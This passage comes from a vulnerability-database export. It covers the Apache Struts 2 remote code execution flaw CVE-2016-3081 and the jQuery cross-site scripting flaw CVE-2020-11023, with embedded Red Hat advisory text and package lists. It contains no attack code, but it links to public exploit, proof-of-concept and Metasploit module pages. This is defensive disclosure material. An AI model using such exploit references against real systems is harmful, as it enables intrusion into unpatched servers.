"http://www.oracle.com/technetwork/topics/security/cpujul2016verbose-2881721.html", }, { title: "Oracle Critical Patch Update Advisory - October 2016", trust: 0.8, url: "http://www.oracle.com/technetwork/security-advisory/cpuoct2016-2881722.html", }, { title: "Text Form of Oracle Critical Patch Update - October 2016 Risk Matrices", trust: 0.8, url: "http://www.oracle.com/technetwork/security-advisory/cpuoct2016verbose-2881725.html", }, { title: "Oracle Critical Patch Update Advisory - July 2016", trust: 0.8, url: "http://www.oracle.com/technetwork/security-advisory/cpujul2016-2881720.html", }, { title: "July 2016 Critical Patch Update Released", trust: 0.8, url: "https://blogs.oracle.com/security/entry/july_2016_critical_patch_update", }, { title: "October 2016 Critical Patch Update Released", trust: 0.8, url: "https://blogs.oracle.com/security/entry/october_2016_critical_patch_update", }, { title: "Apache Struts 2 Fixes for arbitrary code execution vulnerabilities", trust: 0.6, url: "http://www.cnnvd.org.cn/web/xxk/bdxqById.tag?id=61268", }, { title: "Red Hat: CVE-2016-3081", trust: 0.1, url: "https://vulmon.com/vendoradvisory?qidtp=red_hat_cve_database&qid=CVE-2016-3081", }, { title: "Forcepoint Security Advisories: CVE-2016-3081 Apache Struts 2 security vulnerability", trust: 0.1, url: "https://vulmon.com/vendoradvisory?qidtp=forcepoint_security_advisories&qid=11425734a2681a4f1da0e4a7a8f3837d", }, { title: "Oracle: Oracle Critical Patch Update Advisory - July 2016", trust: 0.1, url: "https://vulmon.com/vendoradvisory?qidtp=oracle_advisories&qid=3a04485ebb79f7fbc2472bf9af5ce489", }, { title: "Oracle: Oracle Critical Patch Update Advisory - October 2016", trust: 0.1, url: "https://vulmon.com/vendoradvisory?qidtp=oracle_advisories&qid=05aabe19d38058b7814ef5514aab4c0c", }, { title: "PyEXP", trust: 0.1, url: "https://github.com/jooeji/PyEXP ", }, { title: "S02-32-POC", trust: 0.1, url: "https://github.com/killerhack/S02-32-POC ", }, ], sources: [ { db: "VULMON", id: "CVE-2016-3081", }, { db: "JVNDB", id: "JVNDB-2016-002326", }, { db: "CNNVD", id: "CNNVD-201604-585", }, ], }, problemtype_data: { "@context": { "@vocab": "https://www.variotdbs.pl/ref/problemtype_data#", sources: { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#", }, }, }, data: [ { problemtype: "CWE-77", trust: 1, }, { problemtype: "CWE-Other", trust: 0.8, }, ], sources: [ { db: "JVNDB", id: "JVNDB-2016-002326", }, { db: "NVD", id: "CVE-2016-3081", }, ], }, references: { "@context": { "@vocab": "https://www.variotdbs.pl/ref/references#", data: { "@container": "@list", }, sources: { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#", }, }, }, data: [ { trust: 2.2, url: "http://www.oracle.com/technetwork/security-advisory/cpujul2016-2881720.html", }, { trust: 1.9, url: "http://www.huawei.com/en/psirt/security-advisories/huawei-sa-20160527-01-struts2-en", }, { trust: 1.9, url: "http://www.oracle.com/technetwork/security-advisory/cpuoct2016-2881722.html", }, { trust: 1.9, url: "https://struts.apache.org/docs/s2-032.html", }, { trust: 1.6, url: "http://www.securityfocus.com/bid/87327", }, { trust: 1.6, url: "https://www.exploit-db.com/exploits/39756/", }, { trust: 1.6, url: "http://www.securitytracker.com/id/1035665", }, { trust: 1.6, url: "http://packetstormsecurity.com/files/136856/apache-struts-2.3.28-dynamic-method-invocation-remote-code-execution.html", }, { trust: 1.6, url: "http://www.securityfocus.com/bid/91787", }, { trust: 1, url: "http://www.rapid7.com/db/modules/exploit/multi/http/struts_dmi_exec", }, { trust: 1, url: "http://www.rapid7.com/db/modules/exploit/linux/http/struts_dmi_exec", }, { trust: 0.8, url: "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2016-3081", }, { trust: 0.8, url: "https://www.ipa.go.jp/security/ciadr/vul/20160427-struts.html", }, { trust: 0.8, url: "https://www.jpcert.or.jp/at/2016/at160020.html", }, { trust: 0.8, url: "http://jvn.jp/cert/jvnvu91375252", }, { trust: 0.8, url: "https://web.nvd.nist.gov/view/vuln/detail?vulnid=cve-2016-3081", }, { trust: 0.8, url: "http://seclab.dbappsecurity.com.cn/?p=924", }, { trust: 0.6, url: "http/struts_dmi_exec", }, { trust: 0.6, url: "http://www.rapid7.com/db/modules/exploit/multi/", }, { trust: 0.6, url: "http://www.rapid7.com/db/modules/exploit/linux/", }, { trust: 0.3, url: "http://struts.apache.org/", }, { trust: 0.3, url: "http://www.huawei.com/en/psirt/security-notices/huawei-sn-20160427-01-struts2-en", }, { trust: 0.3, url: "http://www.oracle.com", }, { trust: 0.3, url: "http://support.citrix.com/article/ctx216642", }, { trust: 0.3, url: "http://www-01.ibm.com/support/docview.wss?uid=swg21984819", }, { trust: 0.3, url: "http://www-01.ibm.com/support/docview.wss?uid=swg21988710", }, ], sources: [ { db: "BID", id: "87327", }, { db: "BID", id: "91787", }, { db: "JVNDB", id: "JVNDB-2016-002326", }, { db: "CNNVD", id: "CNNVD-201604-585", }, { db: "NVD", id: "CVE-2016-3081", }, ], }, sources: { "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#", data: { "@container": "@list", }, }, data: [ { db: "VULMON", id: "CVE-2016-3081", }, { db: "BID", id: "87327", }, { db: "BID", id: "91787", }, { db: "JVNDB", id: "JVNDB-2016-002326", }, { db: "CNNVD", id: "CNNVD-201604-585", }, { db: "NVD", id: "CVE-2016-3081", }, ], }, sources_release_date: { "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources_release_date#", data: { "@container": "@list", }, }, data: [ { date: "2016-04-26T00:00:00", db: "VULMON", id: "CVE-2016-3081", }, { date: "2016-04-22T00:00:00", db: "BID", id: "87327", }, { date: "2016-07-15T00:00:00", db: "BID", id: "91787", }, { date: "2016-04-28T00:00:00", db: "JVNDB", id: "JVNDB-2016-002326", }, { date: "2016-04-26T00:00:00", db: "CNNVD", id: "CNNVD-201604-585", }, { date: "2016-04-26T14:59:02.207000", db: "NVD", id: "CVE-2016-3081", }, ], }, sources_update_date: { "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources_update_date#", data: { "@container": "@list", }, }, data: [ { date: "2019-08-12T00:00:00", db: "VULMON", id: "CVE-2016-3081", }, { date: "2016-10-26T01:16:00", db: "BID", id: "87327", }, { date: "2018-10-15T09:00:00", db: "BID", id: "91787", }, { date: "2016-11-22T00:00:00", db: "JVNDB", id: "JVNDB-2016-002326", }, { date: "2019-08-15T00:00:00", db: "CNNVD", id: "CNNVD-201604-585", }, { date: "2024-11-21T02:49:19.503000", db: "NVD", id: "CVE-2016-3081", }, ], }, threat_type: { "@context": { "@vocab": "https://www.variotdbs.pl/ref/threat_type#", sources: { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#", }, }, }, data: "network", sources: [ { db: "BID", id: "87327", }, { db: "BID", id: "91787", }, ], trust: 0.6, }, title: { "@context": { "@vocab": "https://www.variotdbs.pl/ref/title#", sources: { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#", }, }, }, data: "Apache Struts2 Arbitrary code execution vulnerability", sources: [ { db: "JVNDB", id: "JVNDB-2016-002326", }, ], trust: 0.8, }, type: { "@context": { "@vocab": "https://www.variotdbs.pl/ref/type#", sources: { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#", }, }, }, data: "Unknown", sources: [ { db: "BID", id: "87327", }, { db: "BID", id: "91787", }, ], trust: 0.6, }, }
var-202004-2191
Vulnerability from variot
In jQuery versions greater than or equal to 1.2 and before 3.5.0, passing HTML from untrusted sources - even after sanitizing it - to one of jQuery's DOM manipulation methods (i.e. .html(), .append(), and others) may execute untrusted code. This problem is patched in jQuery 3.5.0. jQuery is an open source, cross-browser JavaScript library developed by American John Resig programmers. The library simplifies the operation between HTML and JavaScript, and has the characteristics of modularization and plug-in extension. A cross-site scripting vulnerability exists in jQuery versions 1.2 through 3.5.0. The vulnerability stems from the lack of correct validation of client data in WEB applications. An attacker could exploit this vulnerability to execute client code. -----BEGIN PGP SIGNED MESSAGE----- Hash: SHA256
====================================================================
Red Hat Security Advisory
Synopsis: Moderate: pki-core:10.6 and pki-deps:10.6 security, bug fix, and enhancement update Advisory ID: RHSA-2020:4847-01 Product: Red Hat Enterprise Linux Advisory URL: https://access.redhat.com/errata/RHSA-2020:4847 Issue date: 2020-11-03 CVE Names: CVE-2015-9251 CVE-2016-10735 CVE-2018-14040 CVE-2018-14042 CVE-2019-8331 CVE-2019-10146 CVE-2019-10179 CVE-2019-10221 CVE-2019-11358 CVE-2020-1721 CVE-2020-11022 CVE-2020-11023 CVE-2020-15720 ==================================================================== 1. Summary:
An update for the pki-core:10.6 and pki-deps:10.6 modules is now available for Red Hat Enterprise Linux 8.
Red Hat Product Security has rated this update as having a security impact of Moderate. A Common Vulnerability Scoring System (CVSS) base score, which gives a detailed severity rating, is available for each vulnerability from the CVE link(s) in the References section.
- Relevant releases/architectures:
Red Hat Enterprise Linux AppStream (v. 8) - aarch64, noarch, ppc64le, s390x, x86_64
- Description:
The Public Key Infrastructure (PKI) Core contains fundamental packages required by Red Hat Certificate System.
Security Fix(es):
-
jquery: Cross-site scripting via cross-domain ajax requests (CVE-2015-9251)
-
bootstrap: XSS in the data-target attribute (CVE-2016-10735)
-
bootstrap: Cross-site Scripting (XSS) in the collapse data-parent attribute (CVE-2018-14040)
-
bootstrap: Cross-site Scripting (XSS) in the data-container property of tooltip (CVE-2018-14042)
-
bootstrap: XSS in the tooltip or popover data-template attribute (CVE-2019-8331)
-
jquery: Prototype pollution in object's prototype leading to denial of service, remote code execution, or property injection (CVE-2019-11358)
-
jquery: Cross-site scripting due to improper injQuery.htmlPrefilter method (CVE-2020-11022)
-
jquery: Passing HTML containing elements to manipulation methods could result in untrusted code execution (CVE-2020-11023)
-
pki: Dogtag's python client does not validate certificates (CVE-2020-15720)
-
pki-core: Reflected XSS in 'path length' constraint field in CA's Agent page (CVE-2019-10146)
-
pki-core/pki-kra: Reflected XSS in recoveryID search field at KRA's DRM agent page in authorize recovery tab (CVE-2019-10179)
-
pki-core: Reflected XSS in getcookies?url= endpoint in CA (CVE-2019-10221)
-
pki-core: KRA vulnerable to reflected XSS via the getPk12 page (CVE-2020-1721)
For more details about the security issue(s), including the impact, a CVSS score, acknowledgments, and other related information, refer to the CVE page(s) listed in the References section.
Additional Changes:
For detailed information on changes in this release, see the Red Hat Enterprise Linux 8.3 Release Notes linked from the References section.
- Solution:
For details on how to apply this update, which includes the changes described in this advisory, refer to:
https://access.redhat.com/articles/11258
- Bugs fixed (https://bugzilla.redhat.com/):
1376706 - restore SerialNumber tag in caManualRenewal xml 1399546 - CVE-2015-9251 jquery: Cross-site scripting via cross-domain ajax requests 1406505 - KRA ECC installation failed with shared tomcat 1601614 - CVE-2018-14040 bootstrap: Cross-site Scripting (XSS) in the collapse data-parent attribute 1601617 - CVE-2018-14042 bootstrap: Cross-site Scripting (XSS) in the data-container property of tooltip 1666907 - CC: Enable AIA OCSP cert checking for entire cert chain 1668097 - CVE-2016-10735 bootstrap: XSS in the data-target attribute 1686454 - CVE-2019-8331 bootstrap: XSS in the tooltip or popover data-template attribute 1695901 - CVE-2019-10179 pki-core/pki-kra: Reflected XSS in recoveryID search field at KRA's DRM agent page in authorize recovery tab 1701972 - CVE-2019-11358 jquery: Prototype pollution in object's prototype leading to denial of service, remote code execution, or property injection 1706521 - CA - SubjectAltNameExtInput does not display text fields to the enrollment page 1710171 - CVE-2019-10146 pki-core: Reflected XSS in 'path length' constraint field in CA's Agent page 1721684 - Rebase pki-servlet-engine to 9.0.30 1724433 - caTransportCert.cfg contains MD2/MD5withRSA as signingAlgsAllowed. 1732565 - CVE-2019-10221 pki-core: Reflected XSS in getcookies?url= endpoint in CA 1732981 - When nuxwdog is enabled pkidaemon status shows instances as stopped. 1777579 - CVE-2020-1721 pki-core: KRA vulnerable to reflected XSS via the getPk12 page 1805541 - [RFE] CA Certificate Transparency with Embedded Signed Certificate Time stamp 1817247 - Upgrade to 10.8.3 breaks PKI Tomcat Server 1821851 - [RFE] Provide SSLEngine via JSSProvider for use with PKI 1822246 - JSS - NativeProxy never calls releaseNativeResources - Memory Leak 1824939 - JSS: add RSA PSS support - RHEL 8.3 1824948 - add RSA PSS support - RHEL 8.3 1825998 - CertificatePoliciesExtDefault MAX_NUM_POLICIES hardcoded limit 1828406 - CVE-2020-11022 jquery: Cross-site scripting due to improper injQuery.htmlPrefilter method 1842734 - CVE-2019-10179 pki-core: pki-core/pki-kra: Reflected XSS in recoveryID search field at KRA's DRM agent page in authorize recovery tab [rhel-8] 1842736 - CVE-2019-10146 pki-core: Reflected Cross-Site Scripting in 'path length' constraint field in CA's Agent page [rhel-8] 1843537 - Able to Perform PKI CLI operations like cert request and approval without nssdb password 1845447 - pkispawn fails in FIPS mode: AJP connector has secretRequired="true" but no secret 1850004 - CVE-2020-11023 jquery: Passing HTML containing elements to manipulation methods could result in untrusted code execution 1854043 - /usr/bin/PrettyPrintCert is failing with a ClassNotFoundException 1854959 - ca-profile-add with Netscape extensions nsCertSSLClient and nsCertEmail in the profile gets stuck in processing 1855273 - CVE-2020-15720 pki: Dogtag's python client does not validate certificates 1855319 - Not able to launch pkiconsole 1856368 - kra-key-generate request is failing 1857933 - CA Installation is failing with ncipher v12.30 HSM 1861911 - pki cli ca-cert-request-approve hangs over crmf request from client-cert-request 1869893 - Common certificates are missing in CS.cfg on shared PKI instance 1871064 - replica install failing during pki-ca component configuration 1873235 - pki ca-user-cert-add with secure port failed with 'SSL_ERROR_INAPPROPRIATE_FALLBACK_ALERT'
- Package List:
Red Hat Enterprise Linux AppStream (v. 8):
Source: apache-commons-collections-3.2.2-10.module+el8.1.0+3366+6dfb954c.src.rpm apache-commons-lang-2.6-21.module+el8.1.0+3366+6dfb954c.src.rpm apache-commons-net-3.6-3.module+el8.3.0+6805+72837426.src.rpm bea-stax-1.2.0-16.module+el8.1.0+3366+6dfb954c.src.rpm glassfish-fastinfoset-1.2.13-9.module+el8.1.0+3366+6dfb954c.src.rpm glassfish-jaxb-2.2.11-11.module+el8.1.0+3366+6dfb954c.src.rpm glassfish-jaxb-api-2.2.12-8.module+el8.1.0+3366+6dfb954c.src.rpm jackson-annotations-2.10.0-1.module+el8.2.0+5059+3eb3af25.src.rpm jackson-core-2.10.0-1.module+el8.2.0+5059+3eb3af25.src.rpm jackson-databind-2.10.0-1.module+el8.2.0+5059+3eb3af25.src.rpm jackson-jaxrs-providers-2.9.9-1.module+el8.1.0+3832+9784644d.src.rpm jackson-module-jaxb-annotations-2.7.6-4.module+el8.1.0+3366+6dfb954c.src.rpm jakarta-commons-httpclient-3.1-28.module+el8.1.0+3366+6dfb954c.src.rpm javassist-3.18.1-8.module+el8.1.0+3366+6dfb954c.src.rpm jss-4.7.3-1.module+el8.3.0+8058+d5cd4219.src.rpm ldapjdk-4.22.0-1.module+el8.3.0+6784+6e1e4c62.src.rpm pki-core-10.9.4-1.module+el8.3.0+8058+d5cd4219.src.rpm pki-servlet-engine-9.0.30-1.module+el8.3.0+6730+8f9c6254.src.rpm python-nss-1.0.1-10.module+el8.1.0+3366+6dfb954c.src.rpm relaxngDatatype-2011.1-7.module+el8.1.0+3366+6dfb954c.src.rpm resteasy-3.0.26-3.module+el8.2.0+5723+4574fbff.src.rpm slf4j-1.7.25-4.module+el8.1.0+3366+6dfb954c.src.rpm stax-ex-1.7.7-8.module+el8.2.0+5723+4574fbff.src.rpm tomcatjss-7.5.0-1.module+el8.3.0+7355+c59bcbd9.src.rpm velocity-1.7-24.module+el8.1.0+3366+6dfb954c.src.rpm xalan-j2-2.7.1-38.module+el8.1.0+3366+6dfb954c.src.rpm xerces-j2-2.11.0-34.module+el8.1.0+3366+6dfb954c.src.rpm xml-commons-apis-1.4.01-25.module+el8.1.0+3366+6dfb954c.src.rpm xml-commons-resolver-1.2-26.module+el8.1.0+3366+6dfb954c.src.rpm xmlstreambuffer-1.5.4-8.module+el8.2.0+5723+4574fbff.src.rpm xsom-0-19.20110809svn.module+el8.1.0+3366+6dfb954c.src.rpm
aarch64: jss-4.7.3-1.module+el8.3.0+8058+d5cd4219.aarch64.rpm jss-debuginfo-4.7.3-1.module+el8.3.0+8058+d5cd4219.aarch64.rpm jss-debugsource-4.7.3-1.module+el8.3.0+8058+d5cd4219.aarch64.rpm jss-javadoc-4.7.3-1.module+el8.3.0+8058+d5cd4219.aarch64.rpm pki-core-debuginfo-10.9.4-1.module+el8.3.0+8058+d5cd4219.aarch64.rpm pki-core-debugsource-10.9.4-1.module+el8.3.0+8058+d5cd4219.aarch64.rpm pki-symkey-10.9.4-1.module+el8.3.0+8058+d5cd4219.aarch64.rpm pki-symkey-debuginfo-10.9.4-1.module+el8.3.0+8058+d5cd4219.aarch64.rpm pki-tools-10.9.4-1.module+el8.3.0+8058+d5cd4219.aarch64.rpm pki-tools-debuginfo-10.9.4-1.module+el8.3.0+8058+d5cd4219.aarch64.rpm python-nss-debugsource-1.0.1-10.module+el8.1.0+3366+6dfb954c.aarch64.rpm python-nss-doc-1.0.1-10.module+el8.1.0+3366+6dfb954c.aarch64.rpm python3-nss-1.0.1-10.module+el8.1.0+3366+6dfb954c.aarch64.rpm python3-nss-debuginfo-1.0.1-10.module+el8.1.0+3366+6dfb954c.aarch64.rpm
noarch: apache-commons-collections-3.2.2-10.module+el8.1.0+3366+6dfb954c.noarch.rpm apache-commons-lang-2.6-21.module+el8.1.0+3366+6dfb954c.noarch.rpm apache-commons-net-3.6-3.module+el8.3.0+6805+72837426.noarch.rpm bea-stax-api-1.2.0-16.module+el8.1.0+3366+6dfb954c.noarch.rpm glassfish-fastinfoset-1.2.13-9.module+el8.1.0+3366+6dfb954c.noarch.rpm glassfish-jaxb-api-2.2.12-8.module+el8.1.0+3366+6dfb954c.noarch.rpm glassfish-jaxb-core-2.2.11-11.module+el8.1.0+3366+6dfb954c.noarch.rpm glassfish-jaxb-runtime-2.2.11-11.module+el8.1.0+3366+6dfb954c.noarch.rpm glassfish-jaxb-txw2-2.2.11-11.module+el8.1.0+3366+6dfb954c.noarch.rpm jackson-annotations-2.10.0-1.module+el8.2.0+5059+3eb3af25.noarch.rpm jackson-core-2.10.0-1.module+el8.2.0+5059+3eb3af25.noarch.rpm jackson-databind-2.10.0-1.module+el8.2.0+5059+3eb3af25.noarch.rpm jackson-jaxrs-json-provider-2.9.9-1.module+el8.1.0+3832+9784644d.noarch.rpm jackson-jaxrs-providers-2.9.9-1.module+el8.1.0+3832+9784644d.noarch.rpm jackson-module-jaxb-annotations-2.7.6-4.module+el8.1.0+3366+6dfb954c.noarch.rpm jakarta-commons-httpclient-3.1-28.module+el8.1.0+3366+6dfb954c.noarch.rpm javassist-3.18.1-8.module+el8.1.0+3366+6dfb954c.noarch.rpm javassist-javadoc-3.18.1-8.module+el8.1.0+3366+6dfb954c.noarch.rpm ldapjdk-4.22.0-1.module+el8.3.0+6784+6e1e4c62.noarch.rpm ldapjdk-javadoc-4.22.0-1.module+el8.3.0+6784+6e1e4c62.noarch.rpm pki-base-10.9.4-1.module+el8.3.0+8058+d5cd4219.noarch.rpm pki-base-java-10.9.4-1.module+el8.3.0+8058+d5cd4219.noarch.rpm pki-ca-10.9.4-1.module+el8.3.0+8058+d5cd4219.noarch.rpm pki-kra-10.9.4-1.module+el8.3.0+8058+d5cd4219.noarch.rpm pki-server-10.9.4-1.module+el8.3.0+8058+d5cd4219.noarch.rpm pki-servlet-4.0-api-9.0.30-1.module+el8.3.0+6730+8f9c6254.noarch.rpm pki-servlet-engine-9.0.30-1.module+el8.3.0+6730+8f9c6254.noarch.rpm python3-pki-10.9.4-1.module+el8.3.0+8058+d5cd4219.noarch.rpm relaxngDatatype-2011.1-7.module+el8.1.0+3366+6dfb954c.noarch.rpm resteasy-3.0.26-3.module+el8.2.0+5723+4574fbff.noarch.rpm slf4j-1.7.25-4.module+el8.1.0+3366+6dfb954c.noarch.rpm slf4j-jdk14-1.7.25-4.module+el8.1.0+3366+6dfb954c.noarch.rpm stax-ex-1.7.7-8.module+el8.2.0+5723+4574fbff.noarch.rpm tomcatjss-7.5.0-1.module+el8.3.0+7355+c59bcbd9.noarch.rpm velocity-1.7-24.module+el8.1.0+3366+6dfb954c.noarch.rpm xalan-j2-2.7.1-38.module+el8.1.0+3366+6dfb954c.noarch.rpm xerces-j2-2.11.0-34.module+el8.1.0+3366+6dfb954c.noarch.rpm xml-commons-apis-1.4.01-25.module+el8.1.0+3366+6dfb954c.noarch.rpm xml-commons-resolver-1.2-26.module+el8.1.0+3366+6dfb954c.noarch.rpm xmlstreambuffer-1.5.4-8.module+el8.2.0+5723+4574fbff.noarch.rpm xsom-0-19.20110809svn.module+el8.1.0+3366+6dfb954c.noarch.rpm
ppc64le: jss-4.7.3-1.module+el8.3.0+8058+d5cd4219.ppc64le.rpm jss-debuginfo-4.7.3-1.module+el8.3.0+8058+d5cd4219.ppc64le.rpm jss-debugsource-4.7.3-1.module+el8.3.0+8058+d5cd4219.ppc64le.rpm jss-javadoc-4.7.3-1.module+el8.3.0+8058+d5cd4219.ppc64le.rpm pki-core-debuginfo-10.9.4-1.module+el8.3.0+8058+d5cd4219.ppc64le.rpm pki-core-debugsource-10.9.4-1.module+el8.3.0+8058+d5cd4219.ppc64le.rpm pki-symkey-10.9.4-1.module+el8.3.0+8058+d5cd4219.ppc64le.rpm pki-symkey-debuginfo-10.9.4-1.module+el8.3.0+8058+d5cd4219.ppc64le.rpm pki-tools-10.9.4-1.module+el8.3.0+8058+d5cd4219.ppc64le.rpm pki-tools-debuginfo-10.9.4-1.module+el8.3.0+8058+d5cd4219.ppc64le.rpm python-nss-debugsource-1.0.1-10.module+el8.1.0+3366+6dfb954c.ppc64le.rpm python-nss-doc-1.0.1-10.module+el8.1.0+3366+6dfb954c.ppc64le.rpm python3-nss-1.0.1-10.module+el8.1.0+3366+6dfb954c.ppc64le.rpm python3-nss-debuginfo-1.0.1-10.module+el8.1.0+3366+6dfb954c.ppc64le.rpm
s390x: jss-4.7.3-1.module+el8.3.0+8058+d5cd4219.s390x.rpm jss-debuginfo-4.7.3-1.module+el8.3.0+8058+d5cd4219.s390x.rpm jss-debugsource-4.7.3-1.module+el8.3.0+8058+d5cd4219.s390x.rpm jss-javadoc-4.7.3-1.module+el8.3.0+8058+d5cd4219.s390x.rpm pki-core-debuginfo-10.9.4-1.module+el8.3.0+8058+d5cd4219.s390x.rpm pki-core-debugsource-10.9.4-1.module+el8.3.0+8058+d5cd4219.s390x.rpm pki-symkey-10.9.4-1.module+el8.3.0+8058+d5cd4219.s390x.rpm pki-symkey-debuginfo-10.9.4-1.module+el8.3.0+8058+d5cd4219.s390x.rpm pki-tools-10.9.4-1.module+el8.3.0+8058+d5cd4219.s390x.rpm pki-tools-debuginfo-10.9.4-1.module+el8.3.0+8058+d5cd4219.s390x.rpm python-nss-debugsource-1.0.1-10.module+el8.1.0+3366+6dfb954c.s390x.rpm python-nss-doc-1.0.1-10.module+el8.1.0+3366+6dfb954c.s390x.rpm python3-nss-1.0.1-10.module+el8.1.0+3366+6dfb954c.s390x.rpm python3-nss-debuginfo-1.0.1-10.module+el8.1.0+3366+6dfb954c.s390x.rpm
x86_64: jss-4.7.3-1.module+el8.3.0+8058+d5cd4219.x86_64.rpm jss-debuginfo-4.7.3-1.module+el8.3.0+8058+d5cd4219.x86_64.rpm jss-debugsource-4.7.3-1.module+el8.3.0+8058+d5cd4219.x86_64.rpm jss-javadoc-4.7.3-1.module+el8.3.0+8058+d5cd4219.x86_64.rpm pki-core-debuginfo-10.9.4-1.module+el8.3.0+8058+d5cd4219.x86_64.rpm pki-core-debugsource-10.9.4-1.module+el8.3.0+8058+d5cd4219.x86_64.rpm pki-symkey-10.9.4-1.module+el8.3.0+8058+d5cd4219.x86_64.rpm pki-symkey-debuginfo-10.9.4-1.module+el8.3.0+8058+d5cd4219.x86_64.rpm pki-tools-10.9.4-1.module+el8.3.0+8058+d5cd4219.x86_64.rpm pki-tools-debuginfo-10.9.4-1.module+el8.3.0+8058+d5cd4219.x86_64.rpm python-nss-debugsource-1.0.1-10.module+el8.1.0+3366+6dfb954c.x86_64.rpm python-nss-doc-1.0.1-10.module+el8.1.0+3366+6dfb954c.x86_64.rpm python3-nss-1.0.1-10.module+el8.1.0+3366+6dfb954c.x86_64.rpm python3-nss-debuginfo-1.0.1-10.module+el8.1.0+3366+6dfb954c.x86_64.rpm
These packages are GPG signed by Red Hat for security. Our key and details on how to verify the signature are available from https://access.redhat.com/security/team/key/
- References:
https://access.redhat.com/security/cve/CVE-2015-9251 https://access.redhat.com/security/cve/CVE-2016-10735 https://access.redhat.com/security/cve/CVE-2018-14040 https://access.redhat.com/security/cve/CVE-2018-14042 https://access.redhat.com/security/cve/CVE-2019-8331 https://access.redhat.com/security/cve/CVE-2019-10146 https://access.redhat.com/security/cve/CVE-2019-10179 https://access.redhat.com/security/cve/CVE-2019-10221 https://access.redhat.com/security/cve/CVE-2019-11358 https://access.redhat.com/security/cve/CVE-2020-1721 https://access.redhat.com/security/cve/CVE-2020-11022 https://access.redhat.com/security/cve/CVE-2020-11023 https://access.redhat.com/security/cve/CVE-2020-15720 https://access.redhat.com/security/updates/classification/#moderate https://access.redhat.com/documentation/en-us/red_hat_enterprise_linux/8/html/8.3_release_notes/
- Contact:
The Red Hat security contact is secalert@redhat.com. More contact details at https://access.redhat.com/security/team/contact/
Copyright 2020 Red Hat, Inc. -----BEGIN PGP SIGNATURE----- Version: GnuPG v1
iQIVAwUBX6I3GNzjgjWX9erEAQiK8w//dJasljC8LcJheQtDfUXL+EG52rGjpyxU B5iSYariTDhQOFRt22udOjbdBaISRD77ozLdz0LusA1NBtR3hQ49ryIWyMUxLNsi 46FLY44YxMY7uofZJExUJoEkN39CYwXqIOaaGnZ8mkn4QVdoKG+UBvBL3gKcE3uk h+PWQaasCHL96ZuLz5OB1ya0StcgVcnIDOJleP0f4TGI8w5LKSj1bdJz2fD1H+JP iBa3QVedFanQpWVqCAjaw2lH+fQUB4F936XltKsqCKD9uaX1A2m+xAMZ8wuHcCUl Nudj4LwT06xGd36tyQVh+0ZolB7aKmErYNicv25VNz1c/QlmXCiBJi3Y62/a7La0 t8bGYPE01RTI1YvLs8c+Bw0SH+NcGPGtLw9Vd8w9hFYed7JUP6Iv9v/lSfbiUXDD R5gcEJPQtN2pRsqZaCmQCY2i9aNwjmyZ3wggmXJ4DtEy5adTmAmTL/Alf8kx1rfC UjfeBWVQ01QMIcwNCZM9ly6au06fioPjHhusCFPqPWnGCoT6mysF//ZOhLemUQci ecbYX+JbbUnbyWQPVIBhV/Zj4D6SqNtY5rciorwTedC8n2zX/8ORTCn1PZz8Oc1S ebaoJI0TA2DuiUtPkKz1REcD8rnSCxPIhCYWfb4nIXKGjBINW8ueyG27VPprkSOh +Ybici9RaUE=VLtX -----END PGP SIGNATURE-----
-- RHSA-announce mailing list RHSA-announce@redhat.com https://www.redhat.com/mailman/listinfo/rhsa-announce . Description:
Red Hat JBoss Enterprise Application Platform 7 is a platform for Java applications based on the WildFly application runtime. Solution:
Before applying this update, make sure all previously released errata relevant to your system have been applied. JIRA issues fixed (https://issues.jboss.org/):
JBEAP-23864 - (7.4.z) Upgrade xmlsec from 2.1.7.redhat-00001 to 2.2.3.redhat-00001 JBEAP-23865 - GSS Upgrade Apache CXF from 3.3.13.redhat-00001 to 3.4.10.redhat-00001 JBEAP-23866 - (7.4.z) Upgrade wss4j from 2.2.7.redhat-00001 to 2.3.3.redhat-00001 JBEAP-23927 - Tracker bug for the EAP 7.4.9 release for RHEL-8 JBEAP-24055 - (7.4.z) Upgrade HAL from 3.3.15.Final-redhat-00001 to 3.3.16.Final-redhat-00001 JBEAP-24081 - (7.4.z) Upgrade Elytron from 1.15.14.Final-redhat-00001 to 1.15.15.Final-redhat-00001 JBEAP-24095 - (7.4.z) Upgrade elytron-web from 1.9.2.Final-redhat-00001 to 1.9.3.Final-redhat-00001 JBEAP-24100 - GSS Upgrade Undertow from 2.2.20.SP1-redhat-00001 to 2.2.22.SP3-redhat-00001 JBEAP-24127 - (7.4.z) UNDERTOW-2123 - Update AsyncContextImpl.dispatch to use proper value JBEAP-24128 - (7.4.z) Upgrade Hibernate Search from 5.10.7.Final-redhat-00001 to 5.10.13.Final-redhat-00001 JBEAP-24132 - GSS Upgrade Ironjacamar from 1.5.3.SP2-redhat-00001 to 1.5.10.Final-redhat-00001 JBEAP-24147 - (7.4.z) Upgrade jboss-ejb-client from 4.0.45.Final-redhat-00001 to 4.0.49.Final-redhat-00001 JBEAP-24167 - (7.4.z) Upgrade WildFly Core from 15.0.19.Final-redhat-00001 to 15.0.21.Final-redhat-00002 JBEAP-24191 - GSS Upgrade remoting from 5.0.26.SP1-redhat-00001 to 5.0.27.Final-redhat-00001 JBEAP-24195 - GSS Upgrade JSF API from 3.0.0.SP06-redhat-00001 to 3.0.0.SP07-redhat-00001 JBEAP-24207 - (7.4.z) Upgrade Soteria from 1.0.1.redhat-00002 to 1.0.1.redhat-00003 JBEAP-24248 - (7.4.z) ELY-2492 - Upgrade sshd-common in Elytron from 2.7.0 to 2.9.2 JBEAP-24426 - (7.4.z) Upgrade Elytron from 1.15.15.Final-redhat-00001 to 1.15.16.Final-redhat-00001 JBEAP-24427 - (7.4.z) Upgrade WildFly Core from 15.0.21.Final-redhat-00002 to 15.0.22.Final-redhat-00001
- Description:
Security Fix(es):
- Addressed a security issue which can allow a malicious playbook author to elevate to the awx user from outside the isolated environment: CVE-2021-20253
- Upgraded to a more recent version of nginx to address CVE-2019-20372
- Upgraded to a more recent version of autobahn to address CVE-2020-35678
- Upgraded to a more recent version of jquery to address CVE-2020-11022 and CVE-2020-11023
